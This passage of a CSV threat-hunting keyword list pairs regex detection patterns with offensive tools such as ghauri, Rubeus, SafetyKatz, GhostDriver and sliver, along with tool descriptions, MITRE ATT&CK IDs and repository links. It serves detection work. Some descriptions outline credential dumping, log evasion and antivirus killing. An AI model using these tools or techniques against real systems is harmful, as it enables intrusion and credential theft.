Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" 
"*ghauri -u *",".{0,1000}ghauri\s\-u\s.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri-*\ghauri-*",".{0,1000}ghauri\-.{0,1000}\\ghauri\-.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.config*",".{0,1000}ghauri\.common\.config.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.lib*",".{0,1000}ghauri\.common\.lib.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.payloads*",".{0,1000}ghauri\.common\.payloads.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" 
"*ghauri.common.session*",".{0,1000}ghauri\.common\.session.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.utils*",".{0,1000}ghauri\.common\.utils.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.core.extract*",".{0,1000}ghauri\.core\.extract.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.core.tests*",".{0,1000}ghauri\.core\.tests.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.extractor.advance*",".{0,1000}ghauri\.extractor\.advance.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.py 
*",".{0,1000}ghauri\.py\s.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri_extractor*",".{0,1000}ghauri_extractor.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri-main.zip*",".{0,1000}ghauri\-main\.zip.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghost_* -v*",".{0,1000}ghost_.{0,1000}\s\-v.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost_sparc*",".{0,1000}ghost_sparc.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost_x86*",".{0,1000}ghost_x86.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation 
Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost01.hwtxt*",".{0,1000}ghost01\.hwtxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*GhostDriver.exe *",".{0,1000}GhostDriver\.exe\s.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*GhostDriver-main.zip*",".{0,1000}GhostDriver\-main\.zip.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*GhostInTheNet off*",".{0,1000}GhostInTheNet\soff.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostInTheNet on*",".{0,1000}GhostInTheNet\son.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostInTheNet.sh *",".{0,1000}GhostInTheNet\.sh\s.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostMapper-main.*",".{0,1000}GhostMapper\-main\..{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*GhostPack*",".{0,1000}GhostPack.{0,1000}","offensive_tool_keyword","GhostPack","A collection of security related toolsets.with known hacktools","T1055 - T1203 - T1218 - T1560","TA0002 - TA0003 
- TA0007","N/A","N/A","Exploitation tools","https://github.com/GhostPack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*GhostPack/ForgeCert*",".{0,1000}GhostPack\/ForgeCert.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*GhostPack/Koh*",".{0,1000}GhostPack\/Koh.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" 
"*GhostPack/Rubeus*",".{0,1000}GhostPack\/Rubeus.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*GhostPack/Rubeus*",".{0,1000}GhostPack\/Rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*GhostPack/SafetyKatz*",".{0,1000}GhostPack\/SafetyKatz.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*GhostPack/Seatbelt*",".{0,1000}GhostPack\/Seatbelt.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*GhostPack/SharpDPAPI*",".{0,1000}GhostPack\/SharpDPAPI.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*GhostPack/SharpUp*",".{0,1000}GhostPack\/SharpUp.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*Ghostpack-CompiledBinaries*",".{0,1000}Ghostpack\-CompiledBinaries.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","10","1009","205","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" "*GhostTask.exe*",".{0,1000}GhostTask\.exe.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*GhostTask-1.0.zip*",".{0,1000}GhostTask\-1\.0\.zip.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). 
- Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*GhostWebShell.cs*",".{0,1000}GhostWebShell\.cs.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*GILLES Lionel aka topotam (@topotam77)*",".{0,1000}GILLES\sLionel\saka\stopotam\s\(\@topotam77\).{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","0","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*gimmecredz*",".{0,1000}gimmecredz.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*ginuerzh/gost*",".{0,1000}ginuerzh\/gost.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. 
they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","1","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*Gioyik/getExploit*",".{0,1000}Gioyik\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. A similar script exists in Kali Linux. but this Python script provides more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","44","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*git clone * /tmp/cheetah*",".{0,1000}git\sclone\s.{0,1000}\s\/tmp\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*git log -p | scanrepo *",".{0,1000}git\slog\s\-p\s\|\sscanrepo\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*git reset eb88d07c43afe407094e7d609248d85a15e148ef --hard* rm -f sshd*",".{0,1000}git\sreset\seb88d07c43afe407094e7d609248d85a15e148ef\s\-\-hard.{0,1000}\srm\s\-f\ssshd.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*github*/COMHunter/*",".{0,1000}github.{0,1000}\/COMHunter\/.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*github*/DeathStar*",".{0,1000}github.{0,1000}\/DeathStar.{0,1000}","offensive_tool_keyword","DeathStar","DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.","T1078 - T1059 - T1047 - T1018 - T1069","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r/DeathStar","1","0","N/A","N/A","10","1563","330","2024-01-23T10:24:34Z","2017-05-21T07:34:57Z" "*github*/dropper.git*",".{0,1000}github.{0,1000}\/dropper\.git.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*github*/MoveKit.git*",".{0,1000}github.{0,1000}\/MoveKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" 
"*github*/Mr-xn/*",".{0,1000}github.{0,1000}\/Mr\-xn\/.{0,1000}","offensive_tool_keyword","spring-core-rce","github user infosec hosting exploitation tools","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*github*/padre.git*",".{0,1000}github.{0,1000}\/padre\.git.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*github.com/*Reaper.exe*",".{0,1000}github\.com\/.{0,1000}Reaper\.exe.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*github.com/Arno0x*",".{0,1000}github\.com\/Arno0x.{0,1000}","offensive_tool_keyword","Github Username","Github username known for exploitation toos and scripts","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Arno0x","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/BishopFox*",".{0,1000}github\.com\/BishopFox.{0,1000}","offensive_tool_keyword","Github Username","Private professional services firm providing offensive security testing to the Fortune 500. 
serving exploitation tools on github","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/BishopFox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/bishopfox/*",".{0,1000}github\.com\/bishopfox\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*github.com/dafthack*",".{0,1000}github\.com\/dafthack.{0,1000}","offensive_tool_keyword","Github Username","Github user hosting exploitation tools for pentest and redteam","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/g3tsyst3m*",".{0,1000}github\.com\/g3tsyst3m.{0,1000}","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*github.com/GoSecure*",".{0,1000}github\.com\/GoSecure.{0,1000}","offensive_tool_keyword","Github Username","github repo name containing multiple exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/GoSecure","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/k8gege*",".{0,1000}github\.com\/k8gege.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*github.com/MythicAgents/*",".{0,1000}github\.com\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*github.com/nccgroup*",".{0,1000}github\.com\/nccgroup.{0,1000}","offensive_tool_keyword","Github Username","github repo name hosting security tools and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/nccgroup","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/postrequest/link*",".{0,1000}github\.com\/postrequest\/link.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*github.com/quickbreach*",".{0,1000}github\.com\/quickbreach.{0,1000}","offensive_tool_keyword","Github Username","An infosec security researcher & penetration tester. hosting offensive tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/rasta-mouse/*",".{0,1000}github\.com\/rasta\-mouse\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
